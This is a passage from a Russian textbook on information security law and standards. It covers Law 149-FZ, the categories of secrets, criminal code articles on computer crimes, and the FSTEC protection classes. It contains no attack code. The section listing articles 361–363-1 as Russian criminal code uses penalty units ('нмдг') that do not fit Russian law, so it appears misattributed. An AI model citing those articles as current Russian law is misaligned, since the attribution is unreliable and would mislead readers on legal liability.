20 информационной сфере. Однако, с вступлением в силу Гражданского кодекса Российской Федерации (I часть), впервые в правовой практике России законодательно определяется информация как объект права (ст.128), но не раскрывается само понятия "информация". Федеральный Закон " Об информации, информационных техно- логиях и о защите информации" [43], направленный на регулирование взаимоотношений в информационной сфере, дает разъяснения по этому вопросу. " Информации (сообщения, данные) независимо от формы их представления; Документированная информация (документ) - зафиксированная на материальном носителе информация с реквизитами, позволяющими ее идентифицировать". Этим Законом определено, что информационные ресурсы, то есть отдельные документы или массивы документов, в том числе и в инфор- мационных системах, являясь объектом отношений физических, юриди- ческих лиц и государства, подлежат обязательному учету и защите, как всякое материальное имущество собственника. При этом, собственнику предоставляется право самостоятельно, в пределах своей компетенции, устанавливать режим защиты информационных ресурсов и доступа к ним. Российская Федерация и ее субъекты являются собственниками ин- формационных ресурсов, создаваемых за счет средств федерального бюджета и бюджетов субъектов Российской Федерации. Кроме того, закон упоминает и такую информацию, которая пред- ставляет собой национальное достояние, т.е. такую которую необходимо защищать.
1.3.1. Цели защиты информации
Основными целями защиты информации Федеральный Закон №
149-ФЗ "Об информации, информационных технологиях и о защите информации", принятый 27 июля 2006 года, видит: предотвращение утечки, хищения, искажения, подделки; предотвращение безопасности личности, общества, государства; предотвращение несанкционирован- ных действий по уничтожению, искажению, блокированию информа- ции; защиту конституционных прав граждан на сохранение личной тай- ны и конфиденциальности персональных данных; сохранение государ- ственной тайны, конфиденциальности документированной информации. Государство, владея информацией, представляющей национальное достояние или содержащей сведения ограниченного доступа, неправо-
21 мерное обращение с которой может нанести ущерб ее собственнику, изыскивает специальные меры, обеспечивающие контроль ее использо- вания и качества защиты. C широким внедрением в повседневную жизнь государственных ор- ганов сети «Интернет» обострилась проблема обеспечения информаци- онной безопасности Российской Федерации. В связи с этим были пере- смотрены вопросы обеспечения информационной безопасности и в 2008 г. был подписан Указ Президента Российской Федерации «О мерах по обеспечению информационной безопасности российской федерации при использовании информационно-телекоммуникационных сетей междуна- родного информационного обмена». В редакции этого Указа от 21.10.2008 N 1510 записано, что подключение информационных систем, информационно-телекоммуникационных сетей и средств вычислитель- ной техники, применяемых для хранения, обработки или передачи ин- формации, содержащей сведения, составляющие государственную тай- ну, либо информации, обладателями которой являются государственные органы и которая содержит сведения, составляющие служебную тайну, к информационно-телекоммуникационным сетям, позволяющим осу- ществлять передачу информации через государственную границу Рос- сийской Федерации, в том числе к международной компьютерной сети "Интернет", не допускается; Однако, любые директивные ограничения при ее использовании в эпоху становления экономических отношений - малоэффективны. Кон- троль за использованием информации в современных условиях проще всего осуществлять через лицензирование деятельности предприятий и организаций, работающих с информацией и выполняющих работы по ее защите. Качество же самих систем, предназначенных для обработки ин- формации и ее защиты, контролируется через систему обязательной сер- тификации. За последнее время появилось достаточно много различных норма- тивно-правовых актов, регулирующих лицензионную деятельность и сертификацию продукции в которых не так-то просто разобраться. Не претендуя на подробные комментарии к законодательству, попробуем разобраться какие же акты применимы к интересующей нас проблеме, и как их использовать.
1.4. Категории информации
При разработке законодательных и других правовых и норматив- ных документов, а также при организации защиты информации важно
22 правильно ориентироваться во всем блоке действующей законодатель- ной базы в этой области. В 86 федеральных законах, 21 указе и распоря- жениях Президента Российской Федерации, 119 постановлениях и рас- поряжениях Правительства Российской Федерации декларированы 32 тайны. При этом заметна тенденция роста числа тайн в Российской Фе- дерации. В "Перечне сведений конфиденциального характера", утвержден- ном Указом Президента РФ от 23.09.2005 N 1111, учтены шесть видов: 1. Сведения о фактах, событиях и обстоятельствах частной жизни гражданина, позволяющие идентифицировать его личность (персональ- ные данные), за исключением сведений, подлежащих распространению в средствах массовой информации в установленных федеральными зако- нами случаях. 2. Сведения, составляющие тайну следствия и судопроизводства, а также сведения о защищаемых лицах и мерах государственной защиты, осуществляемой в соответствии с Федеральным законом от 20 августа 2004 г. N 119-ФЗ "О государственной защите потерпевших, свидетелей и иных участников уголовного судопроизводства" и другими норматив- ными правовыми актами Российской Федерации. 3. Служебные сведения, доступ к которым ограничен органами гос- ударственной власти в соответствии с Гражданским кодексом Россий- ской Федерации и федеральными законами (служебная тайна). 4. Сведения, связанные с профессиональной деятельностью, доступ к которым ограничен в соответствии с Конституцией Российской Феде- рации и федеральными законами (врачебная, нотариальная, адвокатская тайна, тайна переписки, телефонных переговоров, почтовых отправле- ний, телеграфных или иных сообщений и так далее). 5. Сведения, связанные с коммерческой деятельностью, доступ к которым ограничен в соответствии с Гражданским кодексом Российской Федерации и федеральными законами (коммерческая тайна). 6. Сведения о сущности изобретения, полезной модели или про- мышленного образца до официальной публикации информации о них. Как было отмечено выше, базовым законом в области защиты ин- формации является Федеральный Закон "Об информации, информаци- онных технологиях и о защите информации", который регламентиру- ет отношения, возникающие при формировании и использовании ин- формационных ресурсов Российской Федерации на основе сбора, накоп- ления, хранения, распространения и предоставления потребителям до- кументированной информации, а также при создании и использовании
23 информационных технологий, при защите информации и прав субъек- тов, участвующих в информационных процессах и информатизации. В соответствие с этим Законом должны быть приведены ранее из- данные Президентом Российской Федерации и Правительством Россий- ской Федерации правовые акты, а также все законодательство России (статья 5 Закона №149-ФЗ). Закон гласит: 1. Информация может являться объектом публичных, гражданских и иных правовых отношений. Информация может свободно использо- ваться любым лицом и передаваться одним лицом другому лицу, если федеральными законами не установлены ограничения доступа к инфор- мации либо иные требования к порядку ее предоставления или распро- странения. 2. Информация в зависимости от категории доступа к ней подразде- ляется на общедоступную информацию, а также на информацию, доступ к которой ограничен федеральными законами (информация ограничен- ного доступа). 3. Информация в зависимости от порядка ее предоставления или распространения подразделяется на: 1) информацию, свободно распространяемую; 2) информацию, предоставляемую по соглашению лиц, участвую- щих в соответствующих отношениях; 3) информацию, которая в соответствии с федеральными законами подлежит предоставлению или распространению; 4) информацию, распространение которой в Российской Федерации ограничивается или запрещается. Обязательным является соблюдение конфиденциальности инфор- мации, доступ к которой ограничен (статья 9, часть 2). 3. Защита информации, составляющей государственную тайну, осуществляется в соответствии с законодательством Российской Феде- рации о государственной тайне (статья 9, часть 3). В положении о порядке обращения со служебной информацией ограниченного распространения в федеральных органах исполнительной власти, утвержденном Постановлением Правительства Российской Фе- дерации от 3 ноября 1994 г. № 1233, дается следующее определение служебной информации ограниченного распространения. К ней отно- сится несекретная информация, касающаяся деятельности организаций, ограничения на распространение которой диктуются служебной необхо- димостью.
24 ПЕРСОНАЛЬНЫЕ ДАННЫЕ - любая информация, относящаяся к определенному или определяемому на основании такой информации фи- зическому лицу (субъекту персональных данных), в том числе его фами- лия, имя, отчество, год, месяц, дата и место рождения, адрес, семейное, социальное, имущественное положение, образование, профессия, дохо- ды, другая информация; Из этих законодательных актов следует: информация из любой области знаний и деятельности в принципе является открытой и общедоступной, если законодательством не преду- смотрено ограничение доступа к ней в установленном порядке; категория "КОНФИДЕНЦИАЛЬНАЯ ИНФОРМАЦИЯ", объединяет все виды защищаемой информации (тайн). Это относится и к государ- ственным и к негосударственным информационным ресурсам. При этом исключение составляет информация, отнесенная к государственной тайне: она к конфиденциальной информации не относится, а является составной частью информации с ограниченным доступом. Отнесение информации к категориям осуществляется: к ГОСУДАРСТВЕННОЙ ТАЙНЕ - в соответствии с Законом Рос- сийской Федерации "О государственной тайне"; к КОНФИДЕНЦИАЛЬНОЙ ИНФОРМАЦИИ - в порядке, установ- ленном законодательством РФ; к ПЕРСОНАЛЬНЫМ ДАННЫМ о гражданах - федеральным зако- ном. Изложенное можно проиллюстрировать следующим образом как представлено на рис. 2.
25 ИНФОРМАЦИОННЫЕ РЕСУРСЫ
Ограниченные к распространению сведения Общедоступная информация
Сведения, содержащие Сведения, содержащие Сведения, которые не могут быть
государственную тайну конфиденциальную информацию конфиденциальными
Личные сведения Служебная
тайна
Персональные Профессиональная Коммерческая
данные тайна тайна
Банковская тайна Врачебная тайна Тайна связи Нотариальная тайна Адвокатская тайна
Рис. 2. Структура информационных ресурсов в РФ
1.4.1. Режимы защиты информации
В соответствии с "Законом об информации" режим защиты инфор-
мации устанавливается (статья 9, часть 3): в отношении сведений, отнесенных к ГОСУДАРСТВЕННОЙ ТАЙНЕ, - уполномоченными органами на основании Закона Рос- сийской Федерации "О государственной тайне"; в отношении конфиденциальной информации - Обладателем ин- формации или оператором информационной системы; в отношении персональных данных - отдельным федеральным за- коном. Принципиальным здесь является положение, что режим защиты конфиденциальной информации определяет ее собственник, то есть со- ответствующий орган государственной власти или управления, органи- зация, учреждение, предприятие.
26 Категория "служебная тайна" Категория "СЛУЖЕБНАЯ ТАЙНА" ранее применялась для обозна- чения сведений ведомственного характера с грифом "секретно" и за ее разглашение предусматривалась уголовная ответственность. В настоя- щее время эта категория из Уголовного кодекса изъята и в прежнем ее понимании из правового поля исчезла в связи с принятием в июле 1993 года Закона "О государственной тайне" по двум причинам: во-первых, информация с грифом "секретно" теперь составляет гос- ударственную тайну; во-вторых, применение грифов секретности для других категорий ин- формации не допускается в соответствии со статьей 8 указанного Закона. Вместе с тем, Гражданским кодексом Российской Федерации, вве- денным в действие с 1995 года, предусмотрена категория "служебная тайна" в сочетании с категорией "коммерческая тайна". Статья 139 Ко- декса гласит: Информация составляет служебную или коммерческую тайну в случае, если информация имеет действительную или потенциальную коммерческую ценность в силу неизвестности ее третьим лицам, к ней нет свободного доступа на законном основании и обладатель информа- ции принимает меры к охране ее конфиденциальности. Информация, составляющая служебную или коммерческую тайну, защищается способами, предусмотренными настоящим Кодексом и дру- гими законами. Из этого следует, что произошло изменение содержания категории "служебная тайна": с января 1995 года под ней (по аналогии с коммерче- ской тайной в негосударственных структурах) понимается служебная информация в государственных структурах, имеющая коммерческую ценность. В отличие от коммерческой тайны (в коммерческих структу- рах) защищаемая государством конфиденциальная информация не огра- ничивается только коммерческой ценностью, поэтому служебная тайна является составной частью конфиденциальной информации. В государ- ственных структурах еще может быть информация, имеющая политиче- скую или иную ценность. Поскольку к служебной тайне она не относит- ся, ей необходимо присваивать гриф "конфиденциально" или иной гриф (к примеру, "для служебного пользования", применяемый в органах ис- полнительной власти и установленный постановлением Правительства Российской Федерации от 3 ноября 1994 г. N 1233). Такая трактовка категории "служебная тайна" соответствует проек- ту Федерального закона "О коммерческой тайне", где предусмотрено
27 при передачи информации с грифом "коммерческая тайна" в государ- ственные органы охранять ее как служебную тайну (статья 18, часть 1 проекта Закона). За разглашение служебной тайны уголовная ответственность новым Уголовным кодексом РФ не предусмотрена, в отличие от коммерческой тайны (статья 183). Статьей 16 (часть 4) "Закона об информации" предусмотрен посто- янный контроль со стороны обладателя информации или оператора ин- формационной системы за обеспечением уровня защищенности инфор- мации. Это означает, что контроль состояния защиты должен охватывать все три составляющие информации с ограниченным доступом, входящей в государственные информационные ресурсы: информацию, составляющую государственную тайну; конфиденциальную информацию; персональные данные о гражданах. При этом, контроль в равной степени должен охватывать и негосу- дарственные структуры при наличии у них (при передаче им на закон- ном основании) указанных видов информации, входящих в государ- ственные информационные ресурсы. Кроме этого, следует рассмотреть классификацию компьютерных преступлений согласно УК РФ.
1.5. Классификация компьютерных преступлений
Для тех, кто хочет посмотреть на проблему безопасности со сторо- ны злоумышленника, следует напомнить, что с 1997 года начали дей- ствовать новые статьи Уголовного кодекса РФ, где, к сожалению, до- вольно расплывчато и нечетко описывается возможная уголовная ответ- ственность за "преступления в сфере компьютерной информации" (глава 28 "Преступления в сфере компьютерной информации"): Содержание статьи 272 УК РФ: 1. Неправомерный доступ к охраняемой законом компьютерной инфор- мации, то есть информации на машинном носителе, в электронно- вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование ин- формации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере до двухсот тысяч рублей или в раз- мере заработной платы или иного дохода осужденного за период до восем-
28 надцати месяцев, либо исправительными работами на срок от шести меся- цев до одного года, либо лишением свободы на срок до двух лет. (в ред. Федерального закона от 08.12.2003 N 162-ФЗ) 2. То же деяние, совершенное группой лиц по предварительному сгово- ру или организованной группой либо лицом с использованием своего слу- жебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, - наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо ли- шением свободы на срок до пяти лет. Содержание статьи 273 УК РФ: 1. Создание программ для ЭВМ или внесение изменений в существую- щие программы, заведомо приводящих к несанкционированному уничтоже- нию, блокированию, модификации либо копированию информации, наруше- нию работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими про- граммами - наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев. (в ред. Федерального закона от 08.12.2003 N 162-ФЗ) 2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет. Содержание статьи 274 УК РФ: 1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети ли- цом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничто- жение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, - наказывается лишением права занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет, либо обяза- тельными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет. 2. То же деяние, повлекшее по неосторожности тяжкие последствия, - наказывается лишением свободы на срок до четырех лет.
С 18.01.2005г. в УК РФ введена новая уголовная ответственность за
компьютерные преступления: Содержание статьи 361 УК РФ. Несанкционированное вмешательство в работу ЭВМ (компьютеров), ав- томатизированных систем, компьютерных сетей или сетей электросвязи (взлом, хакинг)
29 - наказывается штрафом от 600 до 1000 нмдг. или ограничением свобо- ды на срок от 2 года до 5 лет, или лишением свободы на срок до 3 лет права занимать определенные должности или заниматься определенной деятель- ностью на срок до 2 лет или без такого, с конфискацией программных и тех- нических средств. Ст. 361 – 1 УК РФ. Создание с целью использования, распространения или сбыта вредных программных или технических средств, а также их распространение или сбыт (вирусы, разведывательные программы) - наказывается штрафом от 500 до 1000 нмдг. или исправительными работами на срок до 2 лет, или лишением свободы на тот же срок с конфис- кацией программных или технических средств. Ст. 361-2 УК РФ. Несанкционированные сбыт или распространение информации с огра- ниченным доступом, которая хранится в ЭВМ (компьютерах), автоматизиро- ванных системах, компьютерных сетях или на носителях такой информации (служебные базы данных ГАИ, Налоговой службы и т.д.)- наказывается штрафом от 500 до 1000 нмдг. или лишение свободы на срок до 2 лет с кон- фискацией программных или технических средств Содержание статьи 362 УК РФ Несанкционированные действия с информацией, обрабатываемой в ЭВМ (компьютерах), автоматизированных системах, компьютерных сетях или хранящейся на носителях такой информации, совершенные лицом, имею- щим право доступа к ней (неразрешенные операции со своей информацией) - наказывается штрафом от 600 до 1000нмдг. или исправительными ра- ботами на срок до 2 лет с конфискацией программных или технических средств. Содержание статьи 363 УК РФ Нарушение правил эксплуатации ЭВМ (компьютеров), автоматизиро- ванных систем, компьютерных сетей или сетей электросвязи или порядка или правил защиты информации, в них обрабатываемой (снятие защиты) - наказывается штрафом от 500 до 1000нмдг. или ограничением свобо- ды на срок до 3 лет с лишением права занимать определенные должности или заниматься определенной деятельностью на тот же срок. Ст. 363-1 УК РФ. Препятствование работе ЭВМ (компьютеров), автоматизированных си- стем, компьютерных сетей или сетей электросвязи путем массового распро- странения сообщений электросвязи (спам) - наказывается штрафом от 500 до 1000нмдг. или ограничением свобо- ды на срок до 3 лет
30 По своей сути данный закон должен быть направлен именно на зло- умышленников, однако такое правонарушение, как взлом программного обеспечения, даже не упоминается. С другой стороны, расплывчатость формулировок статей закона, в случае их формальной трактовки, позво- ляет привлечь к уголовной ответственности практически любого про- граммиста или системного администратора (например, допустившего ошибку, которая повлекла за собой причинение определенного законом ущерба). Так что программы теперь лучше вообще не писать. Если же говорить серьезно, то применение на практике приведен- ных статей Уголовного кодекса чрезвычайно затруднено. Это связано, во-первых, со сложной доказуемостью подобных дел и, во-вторых, с естественным отсутствием у следователей высокой квалификации в данной области. Поэтому, видимо, пройдет еще не один год, пока мы дождемся успешного уголовного процесса над преступниками в сфере компьютерной информации.
1.6. Руководящие документы ФСТЭК России
(Гостехкомиссии России) в области обеспечения информационной безопасности В 1992 г. специалисты Гостехкомиссии России разработали и опуб- ликовали пять руководящих документов, посвященных вопросам защи- ты информации в автоматизированных системах ее обработки [12-16]. Основой этих документов является концепция защиты средств вычисли- тельной техники (СВТ) и АС от несанкционированного доступа к ин- формации, содержащая систему взглядов ФСТЭК России (Гостехкомиссии России) на проблему информационной безопасности и основные принципы защиты АС. С точки зрения разработчиков данных документов, основная задача средств безопасности - это обеспечение защиты от несанкционированного доступа к информации. Определен- ный уклон в сторону поддержания секретности информации объясняется тем, что данные документы были разработаны в расчете на применение в информационных системах силовых структур РФ. Позже были разра- ботаны другие руководящие документы ФСТЭК России, расширяющие сферу применения [36]. Структура требований безопасности Руководящие документы ФСТЭК России состоят из пяти частей. 1. Защита от несанкционированного доступа к информации. Термины и определения.
31 2. Концепция защиты СВТ и АС от НСД к информации. 3. Автоматизированные системы. Защита от несанкционирован- ного доступа к информации. Классификация автоматизиро- ванных систем и требования по защите информации. 4. Средства вычислительной техники. Защита от несанкциони- рованного доступа к информации. Показатели защищенности от НСД к информации. 5. Временное положение по организации разработки, изготовле- ния и эксплуатации программных и технических средств за- щиты информации от НСД в автоматизированных системах и средствах вычислительной техники. Наибольший интерес представляют вторая, третья и четвертая части. Во второй части излагается система взглядов, основных принципов, которые закладываются в основу проблемы защиты информации от НСД. Руководящие документы ФСТЭК России предлагают две группы требований к безопасности - показатели защищенности СВТ от НСД и критерии защищенности АС обработки данных. Первая группа позволя- ет оценить степень защищенности отдельно поставляемых потребителю компонентов АС и рассматривается в четвертой части, а вторая рассчи- тана на более сложные комплексы, включающие несколько единиц СВТ, и представлена в третье части руководящих документов. Рассмотрим подробно содержание второй части. Основные положения концепции защиты СВТ и АС от HCД к ин- формации Концепция предназначена для заказчиков, разработчиков и пользо- вателей СВТ и АС, используемых для обработки, хранения и передачи требующей защиты информации. Она является методологической базой нормативно-технических и методических документов, направленных на решение следующих задач: выработка требований по защите СВТ и АС от НСД к информации; создание защищенных СВТ и АС, т.е. защищенных от НСД к ин- формации; сертификация защищенных СВТ и АС. Как уже было сказано выше, концепция предусматривает существо- вание двух относительно самостоятельных направлений в проблеме за- щиты информации от НСД: направления, связанного с СВТ, и направле- ния, связанного с АС. Различие двух направлений порождено тем, что СВТ разрабатываются и поставляются на рынок лишь как элементы, из которых в дальнейшем строятся функционально ориентированные АС, и
32 поэтому, не решая прикладных задач, СВТ не содержат пользователь- ской информации. В случае СВТ можно говорить лишь о защищенности (защите) СВТ от НСД к информации, для обработки, хранения и переда- чи которой СВТ предназначено. Примером СВТ можно считать специа- лизированную плату расширения с соответствующим аппаратным и программным интерфейсом, реализующую функции аутентификации пользователя по его биометрическим характеристикам. Или к СВТ мож- но отнести программу прозрачного шифрования данных, сохраняемых на жестком диске. При создании АС появляются такие отсутствующие при разработке СВТ характеристики АС, как полномочия пользователей, модель нару- шителя, технология обработки информации. Типичным примером АС является многопользовательская, многозадачная ОС. Для определения принципов защиты информации в руководящих документах ФСТЭК России дается понятие НСД к информации: НСД - доступ к информации, нарушающий установленные правила разграни- чения доступа, с использованием штатных средств, предоставляемых СВТ или АС. В данном определении под штатными средствами понима- ется совокупность - программного, микропрограммного и технического обеспечения СВТ или АС. К основным способам НСД относятся: непосредственное несанкционированное обращение к объектам доступа (например, через получение программой, управляемой пользователем, доступа на чтение или запись в файл); создание программных и технических средств, выполняющих об- ращение к объектам доступа в обход средств защиты (например, используя люки, оставленные разработчиками системы защиты); модификация средств защиты, позволяющая осуществить НСД (например, путем внедрения в систему защиты программных за- кладок или модулей, выполняющих функции "троянского коня"); внедрение в технические средства СВТ или АС программных или технических механизмов, нарушающих предполагаемую структу- ру и функции СВТ или АС и позволяющих осуществись НСД (например, путем загрузки на компьютер в обход штатной ОС иной ОС, не имеющей функций защиты). Далее в руководящих документах ФСТЭК России представлены семь принципов защиты информации:
33 защита СВТ и АС основывается на положениях и требованиях су- ществующих законов, стандартов и нормативно-методических до- кументов по защите от НСД к информации; защита СВТ обеспечивается комплексом программно-технических средств; защита АС обеспечивается комплексом программно-технических, средств и поддерживающих их организационных мер; защита АС должна обеспечиваться на всех технологических эта- пах обработки информации и во всех режимах функционирования, в том числе при проведении ремонтных и регламентных работ; программно-технические средства защиты не должны существенно ухудшать основные функциональные характеристики АС (надеж- ность, быстродействие, возможность изменения конфигурации АС); неотъемлемой частью работ по защите является оценка эффектив- ности средств защиты, осуществляемая по методике, учитываю- щей всю совокупность технических характеристик оцениваемого объекта, включая технические решения и практическую реализа- цию средств защиты; защита АС должна предусматривать контроль эффективности средств защиты от НСД, который либо может быть периодиче- ским, либо инициироваться по мере необходимости пользователем АС или контролирующими органами. Несмотря на то, что угрозы информации могут реализовываться широким спектром способов, так или иначе изначальным источником всех угроз является человек или нарушитель. В качестве нарушителя рассматривается субъект, имеющий доступ к работе со штатными сред- ствами АС и СВТ и являющийся специалистом высшей квалификации, знающим все об АС и, в частности, о системе и средствах ее защиты. В руководящих документах ФСТЭК России дается классификация нарушителя по уровню возможностей, предоставляемых ему штатными средствами АС и СВТ. Классификация является иерархической, т.е. каждый следующий уровень включает в себя функциональные возмож- ности предыдущего. Выделяется четыре уровня этих возможностей. Первый уровень определяет самый низкий уровень возможностей ведения диалога в АС - запуск задач (программ) из фиксированного набора, реализующих заранее предусмотренные функции по обработке информации (в качестве примера АС, предоставляющей нарушителю описанный круг возможностей, можно привести систему обработки формализованных почтовых сообщений).
34 Второй уровень определяется возможностью создания и запуска собственных программ с новыми функциями по обработке информации (например, в данном случае предполагается, что нарушитель может вы- ступать в роли "обычного" пользователя ОС). Третий уровень определяется возможностью управления функци- онированием АС, т.е. воздействием на базовое программное обеспече- ние системы и на состав и конфигурацию ее оборудования (например, к данному классу относится нарушитель, внедривший в систему безопас- ности АС программную закладку). Четвертый уровень определяется всем объемом возможностей лиц, осуществляющих проектирование, реализацию и ремонт техниче- ских средств АС, вплоть до включения в состав СВТ собственных тех- нических средств с новыми функциями по обработке информации (например, известны случаи, когда в АС внедрялись "временные бом- бы", выводящие систему из строя по истечении срока гарантийного ре- монта). Кроме перечисленных выше понятий во второй части руководящих документов ФСТЭК России рассматриваются: основные направления обеспечения защиты от НСД, в частности основные функции средств разграничения доступа (СРД) и обес- печивающих СРД средств; основные характеристики технических средств защиты от НСД; порядок организации работ по защите.
Показатели защищенности средств вычислительной техники от
НСД В части № 2 руководящих документов ФСТЭК России устанавлива- ется классификация СВТ по уровню защищенности от НСД к информа- ции на базе перечня показателей защищенности и совокупности описы- вающих их требований. Под СВТ понимается совокупность программ- ных и технических элементов систем обработки данных, способных функционировать самостоятельно или в составе других систем. Показатели защищенности содержат требования защищенности СВТ от НСД к информации и применяются к общесистемным про- граммным средствам и операционным системам (с учетом архитектуры компьютера). Конкретные перечни показателей определяют классы за- щищенности СВТ и описываются совокупностью требований. Совокуп- ность всех средств защиты составляет комплекс средств защиты (КСЗ).
35 Так была установлено семь классов защищенности СВТ от НСД к информации. Самый низкий класс-седьмой, самый высокий - первый. Показатели защищенности и требования к классам приведены в табл. 1. Важно отметить, что требования являются классическим примером применения необходимых условий оценки качества защиты, т.е. если какой-либо механизм присутствует, то это является основанием для от- несения СВТ к некоторому классу. Интересно, что защищенные СВТ содержат разделение только по двум классам политик безопасности: дискреционной и мандатной. Невлияние субъектов друг на друга описывается требованием "изо- ляция модулей" (требуется с 4-го класса). Гарантии выполнения полити- ки безопасности коррелированны с требованием "целостность КСЗ" (требуется с 5-го класса) и "гарантии проектирования" (требуется также с 5-го класса).
36 Таблица 1 Распределение показателей защищенности по классам средств вычислительной техники Класс защищенности Наименование показателя 6 5 4 3 2 1 Дискреционный принцип контроля до- + + + = + = ступа Мандатный принцип контроля доступа - - + = = = Очистка памяти - + + + = = Изоляция модулей - - + = + = Маркировка документов - - + = = = Защита ввода и вывода на отчужденный - - + = = = носитель информации Сопоставление пользователя с устрой- - - + = = = ством Идентификация и аутентификация + = + = = = Гарантии проектирования - + + + + + Регистрация - + + + = = Взаимодействие пользователя с КСЗ - - - + = = Надежное восстановление - - - + = = Целостность КСЗ - + + + = = Контроль модификации - - - - + = Контроль дистрибуции - - - - + = Гарантии архитектуры - - - - - + Тестирование + + + + + = Руководство пользователя + = = = = = Руководство по КСЗ + + = + + = Тестовая документация + + + + + = Конструкторская (проектная) докумен- + + + + + + тация Обозначения: “ - ” - нет требований к данному классу “ + ” - новые или дополнительные требования “ = ” - требования совпадают с требованиями к СВТ предыдущего класса
37 1.6.1. Критерии и классы защищенности автоматизированных систем В части № З руководящих документов ФСТЭК России дается клас- сификация АС и требований по защите информации в АС различных классов. При этом определяются: 1. Основные этапы классификации АС: разработка и анализ исходных данных; выявление основных признаков АС, необходимых для класси- фикации; сравнение выявленных признаков АС с классифицируемыми; присвоение АС соответствующего класса защиты информации от НСД. 2. Необходимые исходные данные для классификации конкретной АС: перечень защищаемых информационных ресурсов АС и их уро- вень конфиденциальности; перечень лиц, имеющих доступ к штатным средствам АС с ука- занием их уровня полномочий; матрица доступа или полномочий субъектов доступа по отно- шению к защищаемым информационным ресурсам АС; режим обработки данных в АС. 3. Признаки, по которым производится группировка АС в различ- ные классы: наличие в АС информации различного уровня конфиденциаль- ности; уровень полномочий субъектов доступа АС на доступ к конфи- денциальной информации; режим обработки данных в АС: коллективный или индивиду- альный. Документы ФСТЭК России устанавливают девять классов защищен- ности АС от НСД, распределенных по трем группам. Каждый класс ха- рактеризуется определенной совокупностью требований к средствам за- щиты. В пределах каждой группы соблюдается иерархия классов защи- щенности АС. Класс, соответствующий высшей степени защищенности для данной группы, обозначается индексом Л/А, где Л/-номер группы (от 1 до 3). Следующий класс обозначается Л/Б и т.д.
38 Третья группа включает АС, в которых работает один пользователь, допущенный ко всей информации АС, размещенной на носителях одно- го уровня конфиденциальности. Группа содержит два класса - ЗБ и ЗА. Вторая группа включает АС, в которых пользователи имеют одина- ковые полномочия доступа ко всей информации, обрабатываемой и хра- нимой в АС на носителях различного уровня конфиденциальности. Группа содержит два класса - 2Б и 2А. Первая группа включает многопользовательские АС, в которых од- новременно обрабатывается и хранится информация разных уровней конфиденциальности. Не все пользователи имеют равные права доступа. Группа содержит пять классов -1Д, 1Г, 1В, 1Б и 1А. Данная классификация приведена на рис.3. В табл. 2 приведены требования к подсистемам защиты для каждого класса защищенности. Распределение АС по классам защищенности и минимальные тре- бования для обработки информации ограниченного распространения приведены на рис.4 и рис. 5.
Третья группа Вторая группа Первая группа
В АС работает один В АС пользователи имеют В многопользовательской пользователь, допущенный одинаковые права АС одновременно ко всей информации АС, доступа (полномочия) ко обрабатывается и (или) размещенной на носителях всей информации АС, хранится информация одного уровня обрабатываемой и ( или ) разных уровней конфиденциальности. хранимой на носителях конфиденциальности и не все различного уровня пользователи имеют право конфиденциальности доступа ко всей информации 3Б АС
3А 2Б 2А 1Д 1Г 1В 1Б 1А
Рис. 3. Классы защищенности информации в АС
Таблица 2 Требования к классам защищенности автоматизированных систем Классы Подсистемы и требования 3Б 3А 2Б 2А 1Д 1Г 1В 1Б 1А
39 Классы Подсистемы и требования 3Б 3А 2Б 2А 1Д 1Г 1В 1Б 1А I. Подсистема управления доступом Идентификация, проверка подлинности и контроль доступа субъектов: в систему + + + + + + + + + к терминалам, ЭВМ, узлам сети ЭВМ, каналам свя- + + + + + зи, внешним устройствам ЭВМ к программам + + + + + к томам, каталогам, файлам, записям, полям записей + + + + + Управление потоками информации + + + + II. Подсистема регистрации и учета Регистрация и учет: входа/выхода субъектов доступа в/из системы (узла + + + + + + + + + сети) выдачи печатных (графических) выходных докумен- + + + + + + тов запуска/завершения программ и процессов (заданий, + + + + + задач) доступа программ субъектов доступа к защищаемым файлам, включая их создание и удаление, передачу + + + + + по линиям и каналам связи доступа программ субъектов доступа к терминалам, ЭВМ, узлам сети ЭВМ, каналам связи, внешним + + + + + устройствам ЭВМ, программам, томам, каталогам, файлам, записям, полям записей изменения полномочий субъектов доступа + + + создаваемых защищаемых объектов доступа + + + + Учет носителей информации + + + + + + + + + Очистка (обнуление, обезличивание) освобождае- мых областей оперативной памяти ЭВМ и внешних + + + + + + накопителей Сигнализация попыток нарушения защиты + + + III. Криптографическая подсистема Шифрование конфиденциальной информации + + + Шифрование информации, принадлежащей различ- ным субъектам доступа (группам субъектов) на раз- + ных ключах Использование аттестованных (сертифицированных) + + + криптографических средств IV. Подсистема обеспечения целостности Обеспечение целостности программных средств и + + + + + + + + + обрабатываемой информации Физическая охрана средств вычислительной техни- + + + + + + + + + ки и носителей информации Наличие администратора (службы) защиты инфор- + + + + мации в АС Периодическое тестирование СЗИ НСД + + + + + + + + + Наличие средств восстановления СЗИ НСД + + + + + + + + +
40 Классы Подсистемы и требования 3Б 3А 2Б 2А 1Д 1Г 1В 1Б 1А Использование сертифицированных средств защиты + + + + + Обозначения: “ + ” - требование к данному классу присутствует.
Распределение по классам защищенности
АС, АС, АС, обрабатывающие обрабатывающие обрабатывающие информацию с информацию с информацию с грифом грифом «совершенно грифом «особой «секретно» секретно» важности»
3А, 3А 3А, 2А 2А 2А, не ниже 1В не ниже 1Б 1А
Рис. 4. Распределение АС по классам защищенности
1 пользователь Многопользовательская в АС АС
Одинаковый Различный уровень доступа к ресурсам АС уровень доступа субъектов к ресурсам АС Класс АС Одинаковый Различный уровень уровень важности информации, обрабатываемой в АС
Рис. 5. Минимальные требования для обработки информации ограничен-
ного распространения
